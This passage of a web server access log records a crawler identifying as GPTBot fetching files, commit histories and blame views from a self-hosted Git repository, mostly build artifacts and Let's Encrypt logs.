AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 11175] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14032] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10299] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11170] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10307] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:31:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33664] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10011] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43102] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43098] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 